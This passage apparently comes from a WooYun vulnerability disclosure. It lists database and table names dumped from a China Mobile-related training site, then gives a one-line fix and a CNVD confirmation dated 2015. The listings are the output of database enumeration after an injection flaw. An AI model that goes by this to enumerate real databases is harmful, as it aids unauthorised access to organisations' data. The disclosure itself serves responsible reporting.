| ecms_enewsuserlist |
| ecms_enewsvote |
| ecms_enewsvotemod |
| ecms_enewsvotetemp |
| ecms_enewswapstyle |
| ecms_enewswfinfo |
| ecms_enewswfinfolog |
| ecms_enewswords |
| ecms_enewsworkflow |
| ecms_enewsworkflowitem |
| ecms_enewswriter |
| ecms_enewsyh |
| ecms_enewszt |
| ecms_enewsztadd |
| ecms_enewsztclass |
| ecms_enewsztf |
| ecms_jjt_course |
| ecms_jjt_course_attach |
| ecms_jjt_course_class |
| ecms_jjt_course_mtag |
| ecms_jjt_course_read |
| ecms_jjt_course_voted |
| ecms_jjt_newcourse |
| ecms_jjt_newsgs |
| ecms_jjt_newteacher |
| ecms_jjt_privilege |
| ecms_jjt_search_log |
| ecms_jjt_shares |
| ecms_jjt_teacher |
| ecms_jjt_teacher_maincourse |
| ecms_jjt_training |
| ecms_jjt_training_teacher |
| ecms_o2o_imgs |
| ecms_o2o_photoshop |
| ecms_xyg_fxs |
| ecms_xyg_uppic |
| ecms_xyg_xueyuan |
| jlr_answer |
| jlr_ask |
| jlr_dongtai |
| jlr_managers |
| mcourse |
| menwu_anlibaominguser |
| share_classroom |
| share_classroom_baoming |
| uc_company |
| uc_members |
| ydtjifen |
| yingyong_course |
| zc_search_list |
| zhuanti_all |
| zhuanti_email |
| zhuanti_microread |
| zhuantilearnmap |
| zhuantilearnmap2 |
| zj_answer |
| zj_ask |
| zj_dongtai |
| zj_experts |
+----------------------------------------------------+
Database: wd
[17 tables]
+----------------------------------------------------+
| businesstype |
| cas_account |
| dict |
| feedbackword |
| instructor |
| item |
| item_type |
| itemcatalog |
| keywords |
| lesson |
| subject_count |
| sys |
| tctrainingcenter |
| usergroup |
| view_lesson_list |
| view_subject_count_pv |
| view_subject_count_visitor |
+----------------------------------------------------+
Database: mysql
[28 tables]
+----------------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| innodb_index_stats |
| innodb_table_stats |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slave_master_info |
| slave_relay_log_info |
| slave_worker_info |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------------+
Database: tmstest
[75 tables]
+----------------------------------------------------+
| applystudents |
| cardlist |
| classroom |
| classscheduledetail |
| classscheduleheader |
| course |
| course_copy |
| coursetype |
| enrollcomment |
| enrolltemplate |
| fileinfo |
| flowapplydetail |
| flowapplyheader |
| flowaudit |
| flowdetail |
| flowheader |
| invitationletter |
| invitationtemplate |
| numbernistribution |
| outsidestudent |
| outstandingstudents |
| personinfo |
| project |
| projectcourse |
| projectcourseclass |
| projectdocument |
| projecttask |
| projecttasklog |
| projecttype |
| proline |
| qm_classlog |
| qm_classsurvey |
| qm_satisfactiondetail |
| qm_satisfactionheader |
| qm_satisfactiontemplate |
| qm_studentparticipation |
| receivednotice |
| receptionlist |
| reportstudents |
| stayinfo

修复方案:

代码修改

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-11-24 14:03

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置。

最新状态:

暂无